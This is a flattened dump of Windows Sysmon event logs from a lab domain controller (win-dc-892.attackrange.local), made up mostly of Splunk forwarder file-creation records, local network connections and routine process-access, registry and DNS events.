23542300x800000000000000011404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:15.171{266CAFBE-64FC-6064-1001-00000000AE01}6660NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4E8AD742025FEB47D154E38BCB47C1B6,SHA256=DC968949EFAEC12B2DB17204A0399B90370119346E56BB515A79DD014FE5463B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:15.171{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C6A64E182A6A6EBC148FBF36D0EBCEA,SHA256=262B7B272B7753061660CBF43ABEAE30D9A375E85F793E41F4EEB5E7A2A0B34D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:16.811{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19E6054C055F4E183B076B2B6B328FCA,SHA256=7343E674DF51EDCF48243AE3C94D1F80F879C1190B7CD0100E2AEDE106148E91,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:14.647{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53722-false10.0.1.12-8000- 354300x800000000000000011407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:14.569{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53721-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x800000000000000011406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:14.569{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53721-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 23542300x800000000000000011410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:17.905{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4067DC0587F0B81EF5C950330026F130,SHA256=9EEF0C146530EAA93A3710F492C64FC0C1627064CF5E37F9003CAEEAA26D8B1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:18.936{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ED719921CA83F14ADB53DFAA481C92F,SHA256=54BFD95E5A8796A00B6F7F24B64834493691123B1883B4F96E1004CD5D2203FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:19.983{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6EAB9BD5A2BD8E4231B2CB69AF6456C,SHA256=BD0C30F183DF442717027CD4D3EEBD8C4CD4C107B5A1C2C9A4FBC53780054EE2,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:20.537{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53723-false10.0.1.12-8000- 23542300x800000000000000011413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:21.014{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94302E58E47FB0D3C2A7A108BDB005A1,SHA256=4626CD065224E59BD1AD06056251DFF70C08EEE18BE5744A2789906E27B02E1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:22.045{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18391529A81D14BD862353D2BB800B88,SHA256=59D5E0FAE3251A8EF01DCA12161F663280703DC020B848E1402613CC878F1501,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:23.061{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3644BF0D205058C1A8F2A1E5653A33CD,SHA256=04C832566B3A1C14CB1EAE5348864EFD3AF68518C43D671750713A3FD8DD274D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:24.107{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A55E7ECFC1BC4DB32B3BF9A7E76D02B9,SHA256=C944BF85230725DAE00C509D5456A090DC30D8C06F259DF9EC4C854DC2CDABF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:25.154{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=782B0BDB5D8D15E156ED42E8DE5E931D,SHA256=7459E834566425DF5FBB36AE064ADD5D5DC60D1EFBA701111C50186A0065D28E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:26.170{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E68E23906A85466F42D28143CF8CB679,SHA256=7556C8C22CB6ED9CD22FC7FA672419C9222AC781C8DF560C503DCAAD9D9C139C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:26.490{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53724-false10.0.1.12-8000- 23542300x800000000000000011420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:27.232{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45FC9916C1B75C9D46834723E930478B,SHA256=7C311B135CC69CF7B5C39D3F164A0D3B3E20B0FC099D7E92D55186F589A6CA91,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:28.263{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=827EF879B3E5336BD7B9E38E9E7E653D,SHA256=13C3283AD9746B33291CC28C5B373FDC2526E68CA0EA9A0A1B4D3429F15EE10C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:29.279{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB988F4AF2A4196E113916A57F8EAF09,SHA256=036538B90A1C36E19809722889B3ECABF13D0C43C66C310EE17EB2B9B0E98584,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:30.294{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81ED824A78721AC38FC56EB210295E4E,SHA256=3B5A0E1E463036938F3696BFCC2716769E4639C1C99554A1A73EAE0C59378414,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:31.310{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CC01D2EBFE9ED6DCB80A7273ECE08E9,SHA256=672A539FEFDAEA92F58AC475865020D0B836DAD735F43619CC289B7A418881D1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:31.615{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53725-false10.0.1.12-8000- 23542300x800000000000000011426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:32.341{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6491E1BAA5BEAFB4D614D021BA495B28,SHA256=B879B4BE47F3424CDED74797C4FFA312F4AB4376D41801E16AF2054CE56FEC0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:33.419{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF093F7C3A53170FCFA2F65FC1C53356,SHA256=FE56E73A98CA2D952296E1F8FBF3F46610B6055911090D532A18A2025C088161,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:34.435{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0482D2415EEE5625F0BA1D435FE15261,SHA256=D140885A91BE14515728CFF3E5D6D200308FC87B9351C5170C8596B4433B3AEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:35.450{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08DA7BDE2DF9E0319278C326B8340ED4,SHA256=221C379E9B64037B008771E2241D338204AD1EAF3703666F2A666B411CA0E764,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:35.419{266CAFBE-64C5-6064-A500-00000000AE01}43565528C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:35.419{266CAFBE-64C5-6064-A500-00000000AE01}43565528C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:35.419{266CAFBE-64C5-6064-A500-00000000AE01}43565528C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:35.403{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:35.403{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:35.403{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:35.403{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6660-6064-6B01-00000000AE01}1532C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000011438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:36.450{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0810FEB67D090498D29A86A94A2E119F,SHA256=FA344EA2FE6EB55CE715F32440D40C96C50EFC08BF09136C6AE1DAA7B9933434,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:37.481{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=130DCD0029584E6E83F8A8C9517C0AB1,SHA256=6E65A6E697B7B3734884A96AF2A67F1E8326536BE8769043BD1331CDC9D694CD,IMPHASH=00000000000000000000000000000000falsetrue 
13241300x800000000000000011439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:10:37.341{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0xdc10ab43) 23542300x800000000000000011441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:38.528{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47E0298DAB50A61AC7C4B74EC7314877,SHA256=22489B167C1253364298CF13DF54C4BE5AE6FFBB44E0A8A5E702F57CDEA44CF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:39.543{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA0E3DD1A345D22AA9C3A189B3922533,SHA256=B369CB0F201762D471CE0B8CCCBE8DA2061EC9BCB0F24C97E2CCC064234608C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:37.537{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53726-false10.0.1.12-8000- 23542300x800000000000000011444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:40.622{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9590C909773B2DE28131F4AD63F62BD5,SHA256=9D0BFB5350AEAFCA94910C38A5589951BEFDF7CB15410C58AD88DB79AD4EB626,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:41.684{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8885176D27CCB9DA8E99237AD3C286B,SHA256=9B72B74C3558103ABAA5B0C4382925F6ACCE9ACD727866DB97D911709ACC78A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:42.699{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34CE686DCF496990EBD4F6F150658044,SHA256=CC2984846D2D5E561EE7AE33D20E2E15DAE0311FDDFEE545640543F799DB26C8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:42.590{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000011450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:43.746{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A80DFE02D269C516F256394BA3B874DB,SHA256=8ECDC0BE7AA9C97A4CAF1A5D2DBFF58A3A28C73ADBF3A3CDE67F4CBE339E1223,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:43.668{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95A80D9B4AD5949BF29894BF1C5657A7,SHA256=6AE46E6F65A933E9209809BD89B61087CB1E629AB56C694701B50FB6E0D79817,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:43.668{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4E8AD742025FEB47D154E38BCB47C1B6,SHA256=DC968949EFAEC12B2DB17204A0399B90370119346E56BB515A79DD014FE5463B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:44.824{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A14E63A2AF403EC4684BBFDFD3789F3,SHA256=57E3F73CF2D2F17643335625330E02612C67B00FEF2B7DCBDFB7D48BDA38B970,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000011458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:43.012{266CAFBE-646C-6064-1100-00000000AE01}1200WIN-DC-8920fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 